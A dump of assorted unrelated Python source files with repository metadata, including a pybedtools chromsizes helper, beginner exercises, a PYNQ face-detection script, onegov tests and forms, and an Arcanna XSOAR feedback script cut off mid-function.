try:
response = urllib.request.urlopen('http://genome.ucsc.edu', timeout=timeout)
return True
except urllib.error.URLError as err:
pass
return False
def get_chromsizes_from_ucsc(genome, saveas=None, mysql='mysql', timeout=None):
"""
Download chrom size info for *genome* from UCSC and returns the dictionary.
If you need the file, then specify a filename with *saveas* (the dictionary
will still be returned as well).
If ``mysql`` is not on your path, specify where to find it with
*mysql=<path to mysql executable>*.
*timeout* is how long to wait for a response; mostly used for testing.
Example usage:
>>> dm3_chromsizes = get_chromsizes_from_ucsc('dm3')
>>> for i in sorted(dm3_chromsizes.items()):
... print('{0}: {1}'.format(*i))
chr2L: (0, 23011544)
chr2LHet: (0, 368872)
chr2R: (0, 21146708)
chr2RHet: (0, 3288761)
chr3L: (0, 24543557)
chr3LHet: (0, 2555491)
chr3R: (0, 27905053)
chr3RHet: (0, 2517507)
chr4: (0, 1351857)
chrM: (0, 19517)
chrU: (0, 10049037)
chrUextra: (0, 29004656)
chrX: (0, 22422827)
chrXHet: (0, 204112)
chrYHet: (0, 347038)
"""
if not internet_on(timeout=timeout):
raise ValueError('It appears you don\'t have an internet connection '
'-- unable to get chromsizes from UCSC')
cmds = [mysql,
'--user=genome',
'--host=genome-mysql.cse.ucsc.edu',
'-A',
'-e',
'select chrom, size from %s.chromInfo' % genome]
try:
p = subprocess.Popen(cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1)
stdout, stderr = p.communicate()
if stderr:
print(stderr)
print('Commands were:\n')
print((subprocess.list2cmdline(cmds)))
lines = stdout.splitlines()[1:]
d = {}
for line in lines:
if isinstance(line, bytes):
line = line.decode('UTF-8')
chrom, size = line.split()
d[chrom] = (0, int(size))
if saveas is not None:
chromsizes_to_file(d, saveas)
return d
except OSError as err:
if err.errno == 2:
raise OSError("Can't find mysql -- if you don't have it "
"installed, you'll have to get chromsizes "
" manually, or "
"specify the path with the 'mysql' kwarg.")
else:
raise
def chromsizes_to_file(chrom_sizes, fn=None):
"""
Converts a *chromsizes* dictionary to a file. If *fn* is None, then a
tempfile is created (which can be deleted with pybedtools.cleanup()).
Returns the filename.
"""
if fn is None:
tmpfn = tempfile.NamedTemporaryFile(prefix='pybedtools.',
suffix='.tmp', delete=False)
tmpfn = tmpfn.name
filenames.TEMPFILES.append(tmpfn)
fn = tmpfn
if isinstance(chrom_sizes, str):
chrom_sizes = chromsizes(chrom_sizes)
fout = open(fn, 'wt')
for chrom, bounds in sorted(chrom_sizes.items()):
line = chrom + '\t' + str(bounds[1]) + '\n'
fout.write(line)
fout.close()
return fn
def chromsizes(genome):
"""
Looks for a *genome* already included in the genome registry; if not found
then it looks it up on UCSC. Returns the dictionary of chromsize tuples
where each tuple has (start,stop).
Chromsizes are described as (start, stop) tuples to allow randomization
within specified regions; e. g., you can make a chromsizes dictionary that
represents the extent of a tiling array.
Example usage:
>>> dm3_chromsizes = chromsizes('dm3')
>>> for i in sorted(dm3_chromsizes.items()):
... print(i)
('chr2L', (0, 23011544))
('chr2LHet', (0, 368872))
('chr2R', (0, 21146708))
('chr2RHet', (0, 3288761))
('chr3L', (0, 24543557))
('chr3LHet', (0, 2555491))
('chr3R', (0, 27905053))
('chr3RHet', (0, 2517507))
('chr4', (0, 1351857))
('chrM', (0, 19517))
('chrU', (0, 10049037))
('chrUextra', (0, 29004656))
('chrX', (0, 22422827))
('chrXHet', (0, 204112))
('chrYHet', (0, 347038))
"""
try:
return getattr(genome_registry, genome)
except AttributeError:
return get_chromsizes_from_ucsc(genome)
atexit.register(cleanup)
| 31.039829 | 106 | 0.552266 |
afd49eaad94da79c1a03b21a1fa9bf0e6ff50d67
| 264 |
py
|
Python
|
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/_SNIPPETS/bryan-guner-gists/pypractice/multiplication-table.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# take a number as an input from user and print a multiplication table of that number
def multiplication_table():
value = int(input('please type a number: '))
for num in range(1, 11):
print(f'{value} * {num} = {value * num}' )
multiplication_table()
| 29.333333 | 85 | 0.67803 |
bb8c08fbf65670b5f9a49f0058783a8bd8f24e70
| 2,030 |
py
|
Python
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 19 |
2017-10-08T03:18:38.000Z
|
2020-07-07T02:34:18.000Z
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 2 |
2017-10-08T03:15:10.000Z
|
2017-10-10T16:10:32.000Z
|
teams/team_joy_of_pink/Xilinx_Hackathon_Master/videoHDMI_FD.py
|
AbinMM/PYNQ_Hackathon_2017
|
711c75e8590b02f313295cef712188691690c948
|
[
"BSD-3-Clause"
] | 28 |
2017-10-07T23:24:36.000Z
|
2022-03-29T08:03:40.000Z
|
from pynq.overlays.base import BaseOverlay
from pynq.lib.video import *
from matplotlib import pyplot as plt
import numpy as np
import cv2
base = BaseOverlay("base.bit")
# monitor configuration: 640*480 @ 60Hz
Mode = VideoMode(640,480,24)
hdmi_out = base.video.hdmi_out
hdmi_out.configure(Mode,PIXEL_BGR)
hdmi_out.start()
# monitor (output) frame buffer size
frame_out_w = 1920
frame_out_h = 1080
# camera (input) configuration
frame_in_w = 640
frame_in_h = 480
videoIn = cv2.VideoCapture(0)
videoIn.set(cv2.CAP_PROP_FRAME_WIDTH, frame_in_w);
videoIn.set(cv2.CAP_PROP_FRAME_HEIGHT, frame_in_h);
print("Capture device is open: " + str(videoIn.isOpened()))
import numpy as np
import PIL
import pyscreenshot as ImageGrab
from pynq.lib.arduino import Grove_Buzzer
from pynq.lib.arduino import ARDUINO_GROVE_G1
# Display webcam image via HDMI Out
#imgemoji = cv2.imread('mj1.jpg',-1)
#orig_mask = imgemoji[:,:,2]
# Create the inverted mask for the mustache
#orig_mask_inv = cv2.bitwise_not(orig_mask)
#imgmj = imgemoji[:,:,0:2]
#origemojiHeight, origemojiWidth = imgmj.shape[:2]
while(True):
ret, frame_vga = videoIn.read()
if (ret):
np_frame = frame_vga
face_cascade = cv2.CascadeClassifier(
'/home/xilinx/jupyter_notebooks/base/video/data/'
'haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(np_frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
cv2.rectangle(np_frame,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = np_frame[y:y+h, x:x+w]
outframe = hdmi_out.newframe()
outframe[0:480,0:640,:] = frame_vga[0:480,0:640,:]
hdmi_out.writeframe(outframe)
cv2.imwrite("frame.jpg",frame_vga)
cv2.waitKey(50)
else:
raise RuntimeError("Failed to read from camera.")
#grove_buzzer = Grove_Buzzer(base.ARDUINO,ARDUINO_GROVE_G1)
#grove_buzzer.play_melody()
| 29.42029 | 63 | 0.692611 |
bbb110fe24d1f99f3cd3fc4417e1ebb0e1097ca3
| 238 |
py
|
Python
|
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/Logic-02/Logic_2-04-no_teen_sum.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def fix_teen(n):
if (n >= 13 and n <= 14) or (n >= 17 and n <= 19):
return 0
def no_teen_sum(a, b, c):
abc = [a, b, c]
count = 0
for i in abc:
if fix_teen(i) != 0:
count += i
return count
| 18.307692 | 54 | 0.453782 |
a59a7b92c51a2d21e18fafaf6589e0318110cfae
| 613 |
py
|
Python
|
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/Projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 5 |
2018-10-11T01:55:40.000Z
|
2021-12-25T23:38:22.000Z
|
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | null | null | null |
Contests/CCC/CCC '00 J3 - Slot Machines.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 1 |
2019-02-22T14:42:50.000Z
|
2019-02-22T14:42:50.000Z
|
q = int(input(""))
s1 = int(input(""))
s2 = int(input(""))
s3 = int(input(""))
s1 = s1 - ((s1 // 35) * 35)
s2 = s2 - ((s2 // 100) * 100)
s3 = s3 - ((s3 // 10) * 10)
a = 0
while q > 0:
s1 += 1
if s1 == 35:
s1 = 0
q += 30
q -= 1
if q == 0:
a += 1
break
s2 += 1
if s2 == 100:
s2 = 0
q += 60
q -= 1
if q == 0:
a += 2
break
s3 += 1
if s3 == 10:
s3 = 0
q += 9
q -= 1
a += 3
print("Martha plays " + str(a) + " times before going broke.")
| 14.255814 | 62 | 0.319739 |
f9eedf671ef8e1104fd89c9f97e4d00a534d4a08
| 770 |
py
|
Python
|
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
Python/EstruturaSequencial/Exercicios/Exercicio14.py
|
ekballo/Back-End
|
b252e3b2a16ce36486344823f14afa6691fde9bc
|
[
"MIT"
] | null | null | null |
#João Papo-de-Pescador, homem de bem, comprou um microcomputador.
# para controlar o rendimento diário de seu trabalho.
# Toda vez que ele traz um peso de peixes.
# maior que o estabelecido pelo regulamento de pesca do estado de São Paulo.
# (50 quilos) deve pagar uma multa de R$ 4,00 por quilo excedente.
# João precisa que você faça um programa que leia a variável peso (peso de peixes) e calcule o excesso.
# Gravar na variável excesso a quantidade de quilos além do limite e na variável multa.
# o valor da multa que João deverá pagar.
# Imprima os dados do programa com as mensagens adequadas.
excesso = float(input('Digite o peso em excesso Kg: '))
multa = 4.00
resultado = multa * excesso
print('O valor pago pelo peso exedido é {}R$'.format(resultado))
| 42.777778 | 104 | 0.750649 |
55a2dd3916f80e081d97e45c5793506134701604
| 325 |
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101 |
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 4 |
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section _1_Basic_Coding_Exercises/16. check if a function returns a whole number without decimals after dividing.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 38 |
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
"""
Write a Python function that takes a division equation d and checks
if it returns a whole number without decimals after dividing.
Examples:
check_division(4/2) ➞ True
check_division(25/2) ➞ False
"""
def check_division(num):
if num % 2 == 0:
return num, True
else:
return num, False
| 18.055556 | 68 | 0.661538 |
75dcf75ba51fe6e7bf8c974c475c690dc9661093
| 6,940 |
py
|
Python
|
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/election_day/utils/test_svg_generator.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from freezegun import freeze_time
from io import StringIO
from tests.onegov.election_day.utils.common import add_election_compound
from tests.onegov.election_day.utils.common import add_majorz_election
from tests.onegov.election_day.utils.common import add_proporz_election
from tests.onegov.election_day.utils.common import add_vote
from tests.onegov.election_day.utils.common import PatchedD3Renderer
from onegov.election_day.utils.svg_generator import SvgGenerator
from pytest import raises
from unittest.mock import patch
class PatchedSvgGenerator(SvgGenerator):
def __init__(self, app):
super(PatchedSvgGenerator, self).__init__(app)
self.renderer = PatchedD3Renderer(app)
def test_generate_svg(election_day_app_gr, session):
generator = SvgGenerator(election_day_app_gr)
with raises(AttributeError):
generator.generate_svg(None, 'things', 'de_CH')
svg = StringIO('<svg></svg>')
with patch.object(generator.renderer, 'get_chart', return_value=svg) as gc:
with freeze_time("2014-04-04 14:00"):
item = add_majorz_election(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm)
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_proporz_election(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_election_compound(session)
lm = item.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
item = add_vote(session, 'complex').proposal
lm = item.vote.last_modified
generator.generate_svg(item, 'lists', lm, 'de_CH')
generator.generate_svg(item, 'candidates', lm, 'de_CH')
generator.generate_svg(item, 'connections', lm, 'de_CH')
generator.generate_svg(item, 'party-strengths', lm, 'de_CH')
generator.generate_svg(item, 'parties-panachage', lm, 'de_CH')
generator.generate_svg(item, 'lists-panachage', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'de_CH')
generator.generate_svg(item, 'districts-map', lm, 'de_CH')
generator.generate_svg(item, 'entities-map', lm, 'it_CH')
generator.generate_svg(item, 'entities-map', lm, 'it_CH')
with freeze_time("2015-05-05 15:00"):
lm = item.vote.last_modified
generator.generate_svg(item, 'map', lm, 'it_CH')
assert gc.call_count == 13
ts = '1396620000'
hm = '41c18975bf916862ed817b7c569b6f242ca7ad9f86ca73bbabd8d9cb26858440'
hp = '624b5f68761f574adadba4145283baf97f21e2bd8b87d054b57d936dac6dedff'
hc = '9130b66132f65a4d5533fecad8cdf1f9620a42733d6dfd7d23ea123babecf4c7'
hb = item.id
files = election_day_app_gr.filestorage.listdir('svg')
assert sorted(files) == sorted([
f'election-{hm}.{ts}.candidates.de_CH.svg',
f'election-{hm}.{ts}.candidates.any.svg',
f'election-{hp}.{ts}.lists.de_CH.svg',
f'election-{hp}.{ts}.candidates.de_CH.svg',
f'election-{hp}.{ts}.connections.de_CH.svg',
f'election-{hp}.{ts}.party-strengths.de_CH.svg',
f'election-{hp}.{ts}.parties-panachage.de_CH.svg',
f'election-{hp}.{ts}.lists-panachage.de_CH.svg',
f'election-{hc}.{ts}.party-strengths.de_CH.svg',
f'election-{hc}.{ts}.parties-panachage.de_CH.svg',
f'ballot-{hb}.{ts}.entities-map.de_CH.svg',
f'ballot-{hb}.{ts}.districts-map.de_CH.svg',
f'ballot-{hb}.{ts}.entities-map.it_CH.svg'
])
def test_create_svgs(election_day_app_gr):
generator = SvgGenerator(election_day_app_gr)
session = election_day_app_gr.session()
fs = election_day_app_gr.filestorage
svg = StringIO('<svg></svg>')
with patch.object(generator.renderer, 'get_chart', return_value=svg) as gc:
generator.create_svgs()
assert gc.call_count == 0
assert election_day_app_gr.filestorage.listdir('svg') == []
with freeze_time("2014-04-04 14:00"):
majorz = add_majorz_election(session)
proporz = add_proporz_election(session)
compound = add_election_compound(session)
vote = add_vote(session, 'complex')
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
fs.touch('svg/somefile')
fs.touch('svg/some.file')
fs.touch('svg/.somefile')
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 33
session.delete(vote)
session.delete(proporz)
session.delete(compound)
session.flush()
generator.create_svgs()
assert gc.call_count == 33
assert len(fs.listdir('svg')) == 1
with freeze_time("2014-04-05 14:00"):
majorz.title = 'Election'
session.flush()
generator.create_svgs()
assert gc.call_count == 34
assert len(fs.listdir('svg')) == 1
session.delete(majorz)
session.flush()
generator.create_svgs()
assert gc.call_count == 34
assert len(fs.listdir('svg')) == 0
| 42.576687 | 79 | 0.637032 |
f985633aabb3522a60768d27843b603693bf5848
| 720 |
py
|
Python
|
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | 16 |
2017-09-13T10:21:40.000Z
|
2020-06-01T04:32:22.000Z
|
benwaonline/schemas/tag_schema.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
from marshmallow_jsonapi import fields
from benwaonline.schemas import BaseSchema
class TagSchema(BaseSchema):
id = fields.String()
name = fields.String()
created_on = fields.DateTime()
num_posts = fields.Int()
class Meta:
type_ = 'tags'
self_url = '/api/tags/{id}'
self_url_kwargs = {'id': '<id>'}
self_url_many = '/api/tags'
posts = fields.Relationship(
type_='posts',
self_url = '/api/tags/{id}/relationships/posts',
self_url_kwargs = {'id': '<id>'},
related_url = '/api/tags/{id}/posts',
related_url_kwargs = {'id': '<id>'},
many=True,
include_resource_linkage=True,
schema='PostSchema'
)
| 27.692308 | 56 | 0.595833 |
f9caa36ee0a597a47c10fc40b5137038c308e2ad
| 43 |
py
|
Python
|
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso_Python/Secao2-Python-Basico-Logica-Programacao/11/aula11.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
#todo: resolução do exercicio da aula10 imc
| 43 | 43 | 0.813953 |
ddfa4e381f52bfa1b56f32b7e7ccfba411c5337a
| 1,066 |
py
|
Python
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/es/test_04_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
assert "nlp.begin_training()" in __solution__, "¿Llamaste a nlp.begin_training?"
assert (
"range(10)" in __solution__
), "¿Estás entrenando por el número correcto de iteraciones?"
assert (
"spacy.util.minibatch(TRAINING_DATA" in __solution__
), "¿Estás usando la herramienta minibatch para crear lotes de los datos de entrenamiento?"
assert (
"text for text" in __solution__ and "entities for text" in __solution__
), "¿Estás separando los textos y las anotaciones correctamente?"
assert "nlp.update" in __solution__, "¿Estás actualizando el modelo?"
__msg__.good(
"Buen trabajo – has entrenado exitosamente tu primer modelo de spaCy. Los "
"números impresos en la terminal representan la pérdida en cada iteración, "
"la cantidad de trabajo que aún queda para el optimizer. Mientras más bajo "
"el número, mejor. En la vida real normalmente querrías usar *muchos* más "
"datos que esto, idealmente por lo menos unos cientos o miles de ejemplos."
)
| 50.761905 | 95 | 0.696998 |
34bf79fe6530032d8f88652ce09124d5d56cfe92
| 1,325 |
py
|
Python
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 5 |
2015-07-28T17:45:21.000Z
|
2019-11-24T15:47:01.000Z
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 1 |
2020-05-22T15:21:36.000Z
|
2020-05-22T15:38:48.000Z
|
format.py
|
DanGrayson/cgc1
|
b9d2de234694aa454248d9bc10ccb22ab92792cd
|
[
"MIT"
] | 1 |
2020-05-09T21:24:10.000Z
|
2020-05-09T21:24:10.000Z
|
#! /usr/bin/python
#Copyright (c) 2014 Gary Furnish
#Licensed under the MIT License (MIT)
import os, fnmatch, json, sys
from multiprocessing import Pool
from utilities import printing_system
with open("settings.json") as settings_file:
settings_json = json.loads(settings_file.read())
clang_install_location = settings_json["clang_install_location"]
clang_install_location = os.path.abspath(clang_install_location)
#See https://stackoverflow.com/questions/2186525/use-a-glob-to-find-files-recursively-in-python
def find_files(directories, patterns):
for directory in directories:
for pattern in patterns:
for root, dirs, files in os.walk(directory):
for basename in files:
if fnmatch.fnmatch(basename, pattern):
filename = os.path.join(root, basename)
yield filename
def format(filename):
printing_system(clang_install_location+"/clang-format -style=file -i " + filename)
pool = Pool()
import sys
if len(sys.argv)==2:
files = list(find_files([sys.argv[1]],["*.cpp","*.cc","*.hpp","*.h"]))
else:
files = list(find_files(["cgc1","cgc1_test","cgc1_alloc_benchmark","mcppalloc", "mcpposutil", "mcpputil","mcppconcurrency"],["*.cpp","*.hpp"]))
pool.map(format,files)
sys.exit(0)
| 35.810811 | 147 | 0.677736 |
1f2e84557af81efccdc31def2c679518080da25b
| 2,333 |
py
|
Python
|
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/forms/form_definition.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.utils import normalize_for_url
from onegov.form import Form, merge_forms, FormDefinitionCollection
from onegov.form.validators import ValidFormDefinition
from onegov.org import _
from onegov.org.forms.fields import HtmlField
from onegov.org.forms.generic import PaymentMethodForm
from wtforms import StringField, TextAreaField, validators
class FormDefinitionBaseForm(Form):
""" Form to edit defined forms. """
title = StringField(_("Title"), [validators.InputRequired()])
lead = TextAreaField(
label=_("Lead"),
description=_("Describes what this form is about"),
render_kw={'rows': 4})
text = HtmlField(
label=_("Text"))
group = StringField(
label=_("Group"),
description=_("Used to group the form in the overview"))
definition = TextAreaField(
label=_("Definition"),
validators=[validators.InputRequired(), ValidFormDefinition()],
render_kw={'rows': 32, 'data-editor': 'form'})
pick_up = TextAreaField(
label=_("Pick-Up"),
description=_("Describes how this resource can be picked up. "
"This text is used on the ticket status page to "
"inform the user")
)
class FormDefinitionForm(merge_forms(
FormDefinitionBaseForm,
PaymentMethodForm
)):
pass
class FormDefinitionUrlForm(Form):
name = StringField(
label=_('Url path'),
validators=[validators.InputRequired()]
)
def ensure_correct_name(self):
if not self.name.data:
return
if self.model.name == self.name.data:
self.name.errors.append(
_('Please fill out a new name')
)
return False
normalized_name = normalize_for_url(self.name.data)
if not self.name.data == normalized_name:
self.name.errors.append(
_('Invalid name. A valid suggestion is: ${name}',
mapping={'name': normalized_name})
)
return False
duplicate_text = _("An entry with the same name exists")
other_entry = FormDefinitionCollection(self.request.session).by_name(
normalized_name)
if other_entry:
self.name.errors.append(duplicate_text)
return False
| 29.910256 | 77 | 0.630519 |
c096098785b8f40d1394f6c218b27d974609a9c9
| 99 |
py
|
Python
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/advanced_sw/IP_COLLECTOR/test1.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://seleniumhq.org/')
| 24.75 | 37 | 0.777778 |
c0ea4a26de553916d8a6a2bcc33b73c31f7eb22a
| 4,783 |
py
|
Python
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Arcanna/Scripts/ArcannaFeedbackPostProcessingScript/ArcannaFeedbackPostProcessingScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
ARCANNA_AUTO_CLOSED_TICKET_PLAYBOOK_PLACEHOLDER = "Arcanna decision:"
def get_value_from_context(key):
return demisto.get(demisto.context(), key)
def send_arcanna_feedback(close_notes, close_reason, closing_user, event_id, job_id):
ret = demisto.executeCommand("arcanna-send-event-feedback", {
"job_id": job_id,
"event_id": event_id,
"label": close_reason,
"username": closing_user,
"closing_notes": close_notes
})
return ret
def extract_feedback_information():
feedback_field = get_value_from_context(key="Arcanna.FeedbackField")
if type(feedback_field) == list and len(feedback_field) > 0:
feedback_field = feedback_field[0]
if not feedback_field:
raise Exception("Failed to get value for Arcanna closing field")
# Get Values from incident
feedback_field_value = demisto.incident().get(feedback_field, None)
if not feedback_field_value:
# if closing field value is Empty try to get it from Args as a fallback
feedback_field_value = demisto.args().get(feedback_field, None)
return feedback_field, feedback_field_value
def add_closing_user_information(closing_user, owner, survey_user):
if not closing_user:
if survey_user:
closing_user = survey_user
elif owner:
closing_user = owner
else:
closing_user = "dbot"
return closing_user
def run_arcanna_send_feedback():
try:
event_id = get_value_from_context(key="Arcanna.Event.event_id")
job_id = get_value_from_context(key="Arcanna.Event.job_id")
incident = demisto.incident()
run_status = incident.get("runStatus")
if run_status == "waiting":
return_error("Trying to close and incident without completing task")
incident_id = incident.get('id')
if not event_id:
demisto.debug("Trying to send feedback for an event which was not sent to Arcanna first.Skipping")
return_results(f'Skipping event feedback with id={incident_id}')
return
args_closing_reason = demisto.args().get("closing_reason", None)
if args_closing_reason:
